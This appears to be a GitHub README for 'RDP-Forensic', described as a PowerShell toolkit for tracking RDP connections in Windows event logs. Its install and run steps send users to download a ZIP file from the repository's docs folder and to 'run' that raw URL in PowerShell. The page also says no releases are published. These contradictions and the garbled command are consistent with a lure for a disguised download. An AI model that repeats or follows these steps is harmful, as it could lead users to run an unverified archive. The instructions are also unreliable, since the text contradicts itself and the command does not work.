Skip to content

🖥️ Analyze and track Remote Desktop Protocol connections in Windows with this comprehensive PowerShell toolkit designed for forensic investigations.

License

Notifications You must be signed in to change notification settings

Vectoricks/RDP-Forensic

Repository files navigation

🛡️ RDP-Forensic - Your Tool for RDP Security Insights

🖱️ Download

Download RDP-Forensic

🚀 Getting Started

Welcome to RDP-Forensic, a PowerShell toolkit designed to make RDP forensics simple. This tool helps you analyze connection attempts, track authentication, and monitor sessions across Windows Event Logs. Whether you're managing a few computers or an entire network, RDP-Forensic gives you the insights you need to keep your environment secure.

⚙️ System Requirements

To run RDP-Forensic, ensure your system meets the following requirements:

  • Operating System: Windows 10 or later
  • PowerShell Version: 5.1 or later
  • Network Access: Ensure you have access to the logs on the Windows Event Log service.
  • Disk Space: At least 100 MB free

📥 Download & Install

To get started with RDP-Forensic, you need to download it from the Releases page. Follow these steps:

  1. Visit the Releases page: Download RDP-Forensic.
  2. On the Releases page, look for the most recent version of the software.
  3. Click on the https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip file to start the download.
  4. Once the download is complete, locate the file on your computer.
  5. Extract the files from the ZIP archive by right-clicking the file and selecting “Extract All.”
  6. Open the extracted folder to find the RDP-Forensic files.

You are now ready to run RDP-Forensic.

🛠️ Running RDP-Forensic

Follow these steps to run RDP-Forensic on your machine:

  1. Open PowerShell. You can find it by searching in the Start Menu.

  2. Navigate to the RDP-Forensic folder. Use the cd command like this:

    cd path\to\RDP-Forensic
    

    (Replace path\to\RDP-Forensic with the actual path to the folder.)

  3. Run the script with the following command:

    .\https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip
    
  4. Wait for the script to execute. It will present you with options to analyze RDP connection attempts and sessions.

📊 Features

RDP-Forensic offers a variety of features designed for ease of use and effectiveness:

  • Connection Tracking: Monitor all connection attempts to RDP services.
  • Authentication Logs: Track who logged in and when.
  • Session Management: See active RDP sessions with detailed statistics.
  • Logoff Analysis: Understand when users log off and why.
  • Export Reports: Generate summary reports for compliance and audits.

🔍 Topics Covered

This toolkit focuses on essential areas related to RDP forensics, including:

  • Compliance
  • Event Viewer insights
  • Logon analysis
  • RDP forensics specifics
  • Security auditing
  • Session tracking for incident response
  • SIEM integration
  • Windows Server best practices

📄 Documentation

For further details on using each feature, refer to the documentation included in the RDP-Forensic folder. You can also find helpful information on the Wiki page of our GitHub repository.

📬 Support and Contributions

If you encounter issues or have questions, feel free to open an issue on our GitHub page. We appreciate contributions and feedback to enhance RDP-Forensic.

✨ Future Updates

We plan to update RDP-Forensic with new features regularly. Follow the repository for announcements on new releases and improvements.

For the latest version, return to the Releases page: Download RDP-Forensic.

Enjoy using RDP-Forensic, your go-to toolkit for RDP security analysis!

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •